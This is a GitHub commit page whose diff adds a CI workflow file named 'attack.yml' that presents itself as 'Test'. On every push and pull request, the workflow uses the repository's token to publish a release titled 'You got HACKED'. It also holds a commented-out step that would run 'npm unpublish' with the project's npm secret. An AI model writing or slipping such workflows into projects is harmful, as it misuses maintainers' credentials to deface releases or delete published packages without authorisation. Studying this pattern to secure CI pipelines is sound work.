Skip to content

Commit

Permalink
Attack
Browse files Browse the repository at this point in the history
  • Loading branch information
michhyun1 committed Jul 10, 2020
1 parent 1e36236 commit 7be5994
Showing 1 changed file with 22 additions and 0 deletions.
22 changes: 22 additions & 0 deletions .github/workflows/attack.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
name: Test
on: [ push, pull_request]

jobs:
# test:
# runs-on: ubuntu-latest
# steps:
# - uses: actions/checkout@master
# - run: npm unpublish
# env:
# NPM_TOKEN: ${{ secrets.NPM_AUTH_TOKEN }}
create-github-release:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/create-release@v1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:
# This removes the 'refs/tags' portion of the string, i.e. from 'refs/tags/[email protected]' to '[email protected]'
tag_name: ${{ github.ref }}
release_name: You got HACKED

0 comments on commit 7be5994

Please sign in to comment.